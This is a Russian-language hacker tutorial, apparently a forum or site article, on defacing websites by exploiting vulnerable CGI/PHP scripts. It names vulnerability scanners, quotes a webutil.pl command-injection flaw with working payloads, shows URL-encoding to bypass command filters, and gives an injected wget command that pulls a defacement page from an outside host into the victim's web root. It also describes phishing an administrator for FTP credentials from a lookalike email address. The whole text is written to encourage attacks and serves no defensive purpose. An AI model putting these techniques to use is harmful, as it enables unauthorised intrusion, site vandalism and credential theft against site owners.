Дефейс

В этой статье я хочу рассказать вам как дефейсят сайты, то есть я начну с подготовки и закончу закачкой дефейса на сервер.
Давай разберёмся что же такое дефейс. Deface(с англ.) – обезображивать, уродовать. Не знаю кто писал мой англо-русский словарь, но в моём понимании deface – это замена главной странички сайта ( ну, по сути, словарь в чём-то прав – страничку ты всё таки уродуешь ). Ну для кого как. В тоже время, при создании дефейса, нужно многое уделять тому, что ты хочешь в поместить на главную страницу сайта жертвы. С одной стороны, дефейсы это хорошо. Вот был у соседа Семёна сайт на дорогом хостинге, а вот оформление страдало не по детски. Бывало зайдешь туда, посмотришь, а потом всю ночь кошмары снятся. Ты ведь не допустишь того, чтобы твоей родной стране по ночам кошмары снились? Ни за что! Тут тебе и поможет дефейс. Вот взломаешь сайт, закачаешь вместо главной страницы фотку какой-нибудь Памелы Андерсон, естественно в обнажённом виде! Вот теперь страна спать будет спокойно, узурпатора Семёна посадят за подрыв национального духа посредствам сети Интернет, а тебя наградят и возьмут в ФСБ, а оттуда и до президента недалеко.
Конечно есть и другая сторона монеты, это про то как за тобой будут охотиться дядки с биретами. Но я думаю сейчас она тебя мало интерисует.
Это был пример типа «зачем нужен дефейс». Ну что заинтерисовался? Тогда читай дальше.

Рас ты всерьёз решил заняться дефейсами, то тогда будем говорить серьёзно.
Первым делом нужно разобраться с помощью чего дефейсят сайты. В первую очередь это cgi,php, pl и другие скрипты, на которых написан сайт. Примерно процентов 60 этих скриптов в сети дырявые, то есть через них можно удалённо выполнять команды. А дырявых скриптов много потому, что в наше время кодеров хороших не так уж и много: кто-то дырявый скрипт написал, залил себе на сайт, потом кто-то пришёл и подумал что раз скрипты используют, значит они хорошие и свой сайт построил на таких же скриптах. Вот так-то. Во-вторых, админ может быть полным начинающим юзером и не париться с настройками и просто сделать панель администратирования на какой-то странице. Чаше всего на панель ставят пароль, но в моей практике встречались и такие случаи, когда панель была открыта для любого пользователя (вот мы угарали!!!). Например www.[target].com/admin. Прикольно, да? Ну так вот. Также неплохо было бы изучить программное обеспечение сайта. А вдруг он стоит на каком-нибудь web-site v1.0? И в третьих, можно взломать хостинг, на котором хостится сайт, потом залезть в его домашнюю директорию ломаемого сайта и просто сменить index.html. Ну думаю до взлома хостинга не дойдёт, да и зачем лезть в home диру сайта, если у тебя в руках весь хостинг (etcpasswd бери и не мучайся).
Получается, что дефейсы, в основном, делаются по средствам дырявых скриптов. Обрати внимание, что скрипты это не только файлы с расширением .cgi, но и .php, .pl и другие. Хотя больше всего в сети распространены .cgi и .php. На них мы и остановимся.
Конечно мы не будем досканально изучать скрипты, находящиеся на ломаемом сайте. Мы поступим по другому – предоставим эту работу сканеру. Но всё же давай разберёмся как он работает. Сканер дырявых cgi – тебе ничего это словосочетание не говорит? Говорит! Да, мне тоже самое оно говорит. То есть в сканере заложена база названий скриптов и небольшой мануал по их эксплуатации. То есть натравив сканер на сайт, он(сканер) проверяет директории сайта на наличие дырявых скриптов, а потом выводит информацию о том какой скрипт он нашёл, и что с помощью него можно сделать. У тебя нет сканера? Вот несколько популярных программ подобной тематики:
X-spider – многофункциональный сканер уязвимостей, полностью на русском языке и весит немного(последняя версия -7.0,но у тебя на неё денег не хватит, так что качай 6.50) www.xspider.ru

D@MNED CGI Scanner – cgi сканер, русский и английский, качать с www.cc.f2s.com

Whisker – на мой взгляд покруче спайдера в этой области, что то навроде nmap’а, качать с www.wiretrip.net/rfp/ но правда нужна поддержка перла( Activeperl или что-то навроде)

Будем считать что сканер по душе ты себе уже выбрал. Тогда принимайся за дело. Запускай сканер и вбивай там адрес сайта в сети. Всё процесс пошёл. Допустим, сканер всё проверил и нашёл один единственный скрипт – webutil.pl и всё, а что же делать дальше? Как использовать уязвимость? Не вопрос. Вбивай в браузере http://www.void.ru/content/663 , там увидишь статью CGI-Жукс: подробно и по русски. Сливай её себе - ещё пригодиться. Так, ищем в статье webutil.pl. Ага! Вот оно:

WEBUTIL.PL
Местонахождение:/cgi-bin/webutil.pl
Уязвимость:Данный скрипт является веб-интерфейсом к утилитам whois, ping, traceroute и прочим, при этом он не проверяет параметры на символы передачи управления, и посему при помощи данного скрипта можно выполнять команды на сервере с привилегиями httpd.

Использование:
Чрезвычайно простое. При передаче скрипту параметров в виде ;%20echo%20hi он соответственно выведет строчку hi, т.е. исполнит команду, стоящую после точки с запятой и пробела. Для того, чтобы в полминуты осуществить deface сервера, залейте свою новую страничку командой
; ftp ftp://login:pass@your.ftp.server/pub/user/evilhacker/index.htm и затем замена осуществляется командой вроде ; mv index.htm /usr/www/data/www.poorsite.com/index.htm. Кстати, подобный образом и осуществляется львиная доля deface'ов серверов под Apache/ UNIX.

Понял? А, не понял что значит всякие там %20 и так далее? Сейчас всё объясню. Это ASCII символы, которые приходят тебе на помощь. То есть в чём состоит дыра скрипта – после ; и пробела он выполняет любую команду. Админ видно просёк это дело и прикрыл все команды, но забыл про то, что эти команды можно вписать в браузер и в ASCII коде. Вот таблица соответствия английских букв и символов с символами ASCII :



0 - %30 A - %41 a - %61
1 - %31 B - %42 b - %62
2 - %32 C - %43 c - %63
3 - %33 D - %44 d - %64
4 - %34 E - %45 e - %65
5 - %35 F - %46 f - %66
6 - %36 G - %47 g - %67
7 - %37 H - %48 h - %68
8 - %38 I - %49 i - %69
9 - %39 J - %4A j - %6A
: - %3A K - %4B k - %6B
= - %3D L - %4C l - %6C
? - %3 F M - %4D m - %6D
@ - %40 N - %4E n - %6E
- %5C O - %4F o - %6F
_ - %5F P - %50 p - %70
- - %7E Q - %51 q - %71
space - %20 R - %52 r - %72
! - %21 S - %53 s - %73
# - %23 T - %54 t - %74
$ - %24 U - %55 u - %75
% - %25 V - %56 v - %76
& - %26 W - %57 w - %77
. - %2E X - %58 x - %78
/ - %2F Y - %59 y - %79
Z - %5A z - %7A

Если же твой сканер не нашёл ничего это не значит, что на сайте нет бажных cgi. Тебе просто надо поискать их самому. Вот например, есть какой-то cgi, который выводит на экран список чего-либо, ты аккуратно подставляешь через | или ; команду, то есть получиться www.[target].com/script.cgi;ls если в скрипте есть дырка, то он выдаст тебе список файлов в текущей директории. Но в скрипте может быть проверка на команды unix, тогда тебе поможет ascii таблица : вбиваем www.[target].com/script.cgi;%6C%73
и если скрипт дырявый, он нам выдаёт листинг директории. Потом резко закачеваем на любой хостинг готовый дефейс под именем Index.html , допустим это 12345.narod.ru, потом залезаем на сайт жертвы и используя дырявый скрипт закачиваем свой дефейс с narod.ru на ломаемый сайт. Это можно сделать следующим образом: www.[target].com/script.cgi;wget -0 index.html http://12345.narod.ru/index.htm. Дефейс готов.
Но также в скрипте может быть проверка на ; или | , то есть скрипт с ними работать не будет. Вот так-то.
А если всё выше перечисленное не действует, воспользуйтесь соц инженерией. Регите себе мыло, похожее на название хостинга. Например, если хостинг это www.host.com мы регим какой-нибудь websupport@hoct.com. С этого мыла пишем письмо нашему горе админу, где парим ему что-нибудь про переконфигурацию оборудования, а также убедительно просим выслать логин и пароль к его ftp аккаунту. А с этим ты наверное знаешь что делать надо.
Ну вот вообщем-то и всё что я могу вам рассказать. Конечно существует ещё множество способов дефейса, но это самые основные. Надеюсь что эта статья тебе поможет.
Удачи.

  • Автор: makar
  • Комментарии: 0
  • Просмотры: 3916
0

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!